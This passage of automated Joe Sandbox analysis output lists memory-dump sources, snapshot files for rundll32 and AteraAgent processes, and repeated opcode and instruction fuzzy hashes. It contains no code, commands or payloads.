                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 21dc58eb19ab188e96db5365a7a08edc078e54e2cd24871086a42761e8e2dbb5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bb6207d75add67994c367b63ccd10ea8ecd93ea3555374c734c1da20e8ad8ad3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21dc58eb19ab188e96db5365a7a08edc078e54e2cd24871086a42761e8e2dbb5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AF044B13203529FD7056B70E90568A7B32EB413A4700C07AE645CF292DF25D88587E4
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c45c7e9bac591ccb42008c2ce7798ee31a8a57fbb1aa70430ae204cbee09a89
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ddf00c66c0d33c4e44f44b30d952ad00f6c912e365024672421ac71e63a2ecfa
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c45c7e9bac591ccb42008c2ce7798ee31a8a57fbb1aa70430ae204cbee09a89
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7016D75B10216CFC704EB79D40566E7BF5BB89654B100479E609DB360EB359D42CB80
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b879a3084aa2bb4a57a29d4f5ead79388b2c358c6901ceb877a423f38a20b896
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e60098e07593d7fc3d9f998367296621c6d6f764f097abaa80f9bb5e55deebbd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b879a3084aa2bb4a57a29d4f5ead79388b2c358c6901ceb877a423f38a20b896
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0FCB061421A5FC709AF7965261577FD9EFC53103180C7ED545CF1E1FA248490CBD1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 23560b16e0dd19b29cd28381052e8ea25072e41bfb294e4adb8552eb0c246cfc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8bae27b0a5b70d373889e8281526453f9ec34c500354cdfa3465744332e0db21
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23560b16e0dd19b29cd28381052e8ea25072e41bfb294e4adb8552eb0c246cfc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE0D87131B6F28FC7170635781A0FE7FE82E8363130541EBE00ADA282CA0D8A418395
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7384e70d042b6a4719e4e16befdc6ddaaa81ec0571ec0d7ed2bb7abb15aad4c5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 975d7170e89888bdd1d4d6c96b785aea583f84f2bc83a4f9d3c5f66ffd613c88
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7384e70d042b6a4719e4e16befdc6ddaaa81ec0571ec0d7ed2bb7abb15aad4c5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0C2322182600FC70287BCF4508D63FAC8F0B62471201D7F505CF267CA559D8087D5
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f7ace04b11b852e44267583de3b19a71ed912caab260bb6733142c3d7f98170d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 16148e123f9c75268cee290c37fcfe485a5b9a164b160a9469856da7d44cc515
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7ace04b11b852e44267583de3b19a71ed912caab260bb6733142c3d7f98170d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6D02B70323936C7DB14157A780F2BE75EC6B43761B018075F51AC2380DF4DCA414384
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ebd8d5d3065cc3e079467c389ea317f4a7e6ab79642e7eb0e9ffd6437987913a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6e9254bf20b2e08874e8b8caada23f5356c7b606e23dc332f7c39658cf18690
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebd8d5d3065cc3e079467c389ea317f4a7e6ab79642e7eb0e9ffd6437987913a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E02B332182549FC3076F64E8554D6BFBCEB1A1603180063F941C7262DE615D10C7D1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d37f33400b1ad1b124561e49716953f7d20f2094e90578a5a7212433891ccb36
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5feb2fd10dc9122ead130a0a39c652f4535b9faafaef7fb6b30ca4f661361bd1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d37f33400b1ad1b124561e49716953f7d20f2094e90578a5a7212433891ccb36
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DE04F7150A2868FCB01CB70A91559ABFF5DF4621472046EBD454DB265DA351E048780
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0fbca28c1ff0470abb2762bac0b33230b7f16d83ff5a2b24d203ff1799356
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60452e5f00b31902723ade4623f62b3c04d5535bc916dcfed2a76f266a99055b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0fbca28c1ff0470abb2762bac0b33230b7f16d83ff5a2b24d203ff1799356
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5D0A7713701205BC600539DE454969779DDB4A710F00046AF20ACB335C991EC404288
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_3_72f0000_rundll32.jbxd
Memory Dump Source
• Source File: 00000005.00000003.1737496496.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
Memory Dump Source
• Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d16575315d8ac007eab076e7aeb455a256aa7721263e82237f03b5c7baf6819
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4bdf17658f072b0e3a1064919fd0a3d8a098f345fda4b5b86cb99a411a2f8942
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d16575315d8ac007eab076e7aeb455a256aa7721263e82237f03b5c7baf6819
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1412870A0962D8FEBA5DF69C8947E9B3B0EF5A300F1140E5D05CD7292CA74AE81CF00
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: N_I$N_^$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3680607079
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b5d22b18cc440dfe90923a4729969234d5ec0b8af47506421305bb7193d9428
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f30238fb160cf7e3c592ffbd111a8d488a08dda10b43a1d80a984eb8ed06bdd2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5d22b18cc440dfe90923a4729969234d5ec0b8af47506421305bb7193d9428
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F15E13B0E69A0BE325AAAEF8615E93B50EF8137170541B7D2ECCE0E7DD14790A83D1
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: N_^$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-324526423
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a70dcc04be9356ccbfca98ec60d9e67fea4587562126b5c26a8972338eee7cf0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 015f5a71941c7c5989de4d29f3f088c904edb53ae9fd0feda86438c442931554
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a70dcc04be9356ccbfca98ec60d9e67fea4587562126b5c26a8972338eee7cf0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBE11026B0E7950FD325BBBD98A15E87B90DF42365B0801FBD1D9CF0E3E918654A8391
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: c$N_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-768855989
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0985becf0a35eb78dc3a538865d385885e6060e2b815b2564bdac21a1465c77b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1fc58705764b8e10a24dac60c51e0a47b055917de6ebc1897214118a8ebc6988
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0985becf0a35eb78dc3a538865d385885e6060e2b815b2564bdac21a1465c77b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F919717B0E6E607E32576ADA8B15E97B50DF42276B0801F7D2DDCE093D908644F8295
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: E
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3568589458
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c2a7747d35cb044eb52d03c79a50e83bd632e5b0fef189b1436d4253375bd93
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 655d6933821762fdfc297f6226e315255045bebd88d5820b4fd852be2be5efae
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c2a7747d35cb044eb52d03c79a50e83bd632e5b0fef189b1436d4253375bd93
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA812522A0EA9D4FF795EB6DD8646E87BA0EF4A311F1401BAC458CF1E7DE242C46C351
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5637de8abb0a572b76e25cbde12dd356329e431106cb2eedd36d8d39b3a8cac5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 41fea8bf88f93b1267d67aa6c206d88f05c2636d194ebc4cc5ef465927aef0b6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5637de8abb0a572b76e25cbde12dd356329e431106cb2eedd36d8d39b3a8cac5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F12830B0DA494FE7A99B2C88656743BD2EF5A710B0501FED09ECB2E7DD25BC428781
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: df01711f82940c079e9b05be98041b26325ae90e06ea66c60b036212134ebb46
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8ef20d039668de8a852f12ffe3fffb018992cf86c10467bf9d1813c86fb5510
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df01711f82940c079e9b05be98041b26325ae90e06ea66c60b036212134ebb46
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41A13B30A0962C8FEBA5DF29C8947E9B7B1EF5A305F1040E9D05DE7295CA74AE85CF00
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e51ee6b06de82fe9a1d924e964d4ff8a0719e4c218f0affd7c0cba8788915e3e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c693f231d1da827d5e9c39de72d21bb24b286d92acd9e36ce0931f8a5b3c3de5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51ee6b06de82fe9a1d924e964d4ff8a0719e4c218f0affd7c0cba8788915e3e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F519431918A4C8FDB68DB58D855BE9BBF1FF59310F0082AAD04DD3296DE34A985CF81
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70466ff5f82b470fa7020266b272c57d4a49cda3b35eeac7e4e3de47677453c2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ee615cca2f7604daa90e601b2a6a65a126117694f526a2404216c407de03bfc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70466ff5f82b470fa7020266b272c57d4a49cda3b35eeac7e4e3de47677453c2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D512E31E0E64E4FE769DF6588A11A83BD0EF47351F1500BED0A9CF1E2EB18B9058752
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794494612.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b6f0000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c72c26ef9f994ca53c24c8624c8b1e1270efe3e2ff22f00f26727edcbe9d523f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b24bd31d976a8f7df3cbaedb89a38d39540ba6e41f457a8142002b02fbfb077e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c72c26ef9f994ca53c24c8624c8b1e1270efe3e2ff22f00f26727edcbe9d523f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7412B62B0EBC94FE7929B7C48665607FE1EF6661030A01FBD099CB2B7DD58AC46C341
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 749eda73b43e16bb7809e197d71712a8641bd415c46103ecf987906d1f03b899
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 726450741f38a553755198bbaf2a2604f1b88fbdfeb86dedebed5f5e1f8df5d9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 749eda73b43e16bb7809e197d71712a8641bd415c46103ecf987906d1f03b899
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC415B30E0951D8FDB58EF99D860AFEB7B1FF5A300F11146AE05AE72A1CB35A940CB50
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b0da06ca691fb4c92552c01d28ca300f9ae58766b5d48e4f8708fbc430f77d1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 215c51130fb67564adb8ef1638ea85febcf4f47cc14409d2d8ce2dd7a37c2988
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b0da06ca691fb4c92552c01d28ca300f9ae58766b5d48e4f8708fbc430f77d1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41A730E0A65C8FEB55DFA9C4506ED7BF0FF5A300F1100AAD048DB2A2CB39A945CB51
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9591b75b45fbb150a7beac5b8f3c4b6808fd1e342367e06284d2c8d55e5b8244
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2bbd295c86d516a5a895ff9eff441a785606c2b35fcfaf53981b02b6689a2304
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9591b75b45fbb150a7beac5b8f3c4b6808fd1e342367e06284d2c8d55e5b8244
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2119530A1991CCFDF94EF99D494AECBBB1FF5A301F5500AAE019E7261CB35A841CB50
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
